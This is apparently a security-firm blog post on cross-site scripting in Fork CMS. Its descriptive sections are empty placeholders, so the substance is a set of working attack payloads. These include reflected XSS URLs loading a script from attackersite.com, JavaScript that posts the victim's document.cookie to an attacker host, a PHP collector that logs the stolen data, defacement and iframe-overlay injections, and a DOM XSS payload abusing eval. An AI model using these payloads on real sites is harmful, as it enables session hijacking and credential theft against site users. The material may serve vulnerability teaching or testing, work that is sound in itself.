Cross-Site Scripting — XSS [CWE-79] — The Hacktivists

1. Description
………………………………

2. Potential impact
………………………………

3. Attack patterns
………………………………

4. Affected software
………………………………

5. Exploitation Examples
………………………………

http://forkcms.local/private/en/error?type=%3Cscript%20src=http://attackersite.com/fork.js%3E%3C/script%3E
function post_to_url(path, params, method) {
var form = document.createElement("form");
form.setAttribute("method", method);
form.setAttribute("action", path);
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", "1");
hiddenField.setAttribute("value", params);
form.appendChild(hiddenField);
document.body.appendChild(form);
form.submit();
}
post_to_url("http://attackersite.com/fork.php", document.cookie, "post");
<?php
file_put_contents($_SERVER["DOCUMENT_ROOT"]."/fork.txt",$_POST,FILE_APPEND);
file_put_contents($_SERVER["DOCUMENT_ROOT"]."/fork.txt","\r\n",FILE_APPEND);
header("Location: http://forkcms.local/private/en/");
exit;
?>
http://forkcms.local/private/en/error?type=%3C/div%3E%3Cdiv%20style=%22color:white;font:75px%20arial;position:absolute;left:0;top:0;background:black;width:100%;height:888px; border:1px%20solid;z-index:1000%22%3E%3Ccenter%3EXSS%3C/div%3E
http://forkcms.local/private/en/error?type=%3C/div%3E%3Ciframe%20src=%22http://www.attacker-site.com/file.html%22%20style=%22border=0;z-index:1000;position:absolute;left:0;top:0;height:100%;width:100%;%22%3E%3C/iframe%3E
{"OnlineUsers": "4", "UserAndStatus": ["User1, Online", "User2, Online", "User3, Online", "User4, Busy"]}
var http_request = new XMLHttpRequest();
var Contacts;
http_request.open("GET", url, true);
http_request.onreadystatechange = function ()
{
if (http_request.readyState == 4)
{
if (http_request.status == 200) {
Contacts = eval("(" + http_request.responseText + ")");
}
http_request = null;
}
};
http_request.send(null);
Busy"});alert("DOM based XSS");//

6. Severity and CVSS Scoring
……………………………………..

--

--

--

Contact us for Information Security Services & Training https://thehacktivists.in/

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Fabulous - Sweet Revenge Hack Free Resources Generator

8 Essential Tips for Creating a Secure Mobile App

Your Guide to Open Source Vs Proprietary Code Security

{UPDATE} Jet Ski Death Race Hack Free Resources Generator

Light Roast 112: How to Avoid Vulnerability Whack-a-Mole

HTTPS HANDSHAKE

How Hackers Hack The Unhackable

Are You Unsure About Security Tokens? Well, Don’t Be!

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
The Hacktivists

The Hacktivists

Contact us for Information Security Services & Training https://thehacktivists.in/

More from Medium

CVE-2022–1813 Blind Command Injection

Write-up: CORS vulnerability with trusted insecure protocols @ PortSwigger Academy

Passive/Active Information Gathering: Subdomain Enumeration

Bug bounties, The glamour.

Thin line between hack to earn and hack to learn